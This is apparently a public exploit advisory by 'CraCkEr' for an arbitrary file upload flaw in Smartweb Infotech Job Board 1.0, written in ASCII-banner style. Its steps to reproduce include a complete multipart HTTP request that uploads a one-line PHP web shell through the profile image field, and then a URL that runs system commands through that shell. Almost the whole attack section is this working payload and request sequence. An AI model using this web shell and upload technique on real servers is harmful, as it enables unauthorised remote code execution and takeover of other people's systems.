┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : https://demo.smartwebinfotech.site/job-board/                              │
│  Vendor   : Smartweb Infotech                                                          │
│  Software : Job Board 1.0 - Job Portal Management System                               │
│  Vuln Type: Arbitrary File Upload Leads to RCE                                         │
│  Impact   : Upload PHPshell and execute commands on the server                         │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│                                                                                        │
│  Allow Attacker to overwrite critical files simply by uploading a shell and execute    │
│  commands on the server                                                                │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09   
       
	CryptoJob (Twitter) twitter.com/0x0CryptoJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


## Steps to Reproduce:

1. Go to [My Profile] on this Path (https://website/settings/account)
2. Upload any Image to capture the request in Burp Suite
3. Replace image.png to upload.php in [filename] and add this simple phpshell

POST /job-board/settings/account HTTP/2

-----------------------------427088175318086545183087924022
Content-Disposition: form-data; name="profile"; filename="shell.php"
Content-Type: image/png

<?php echo system($_GET['command']); ?>
-----------------------------427088175318086545183087924022--

4. Send the Request
5. Back to the Path (https://website/settings/account)
6. Refresh the Page
7. Copy the Link of (Unloaded Image)
8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)
9. RCE Executed!


[-] Done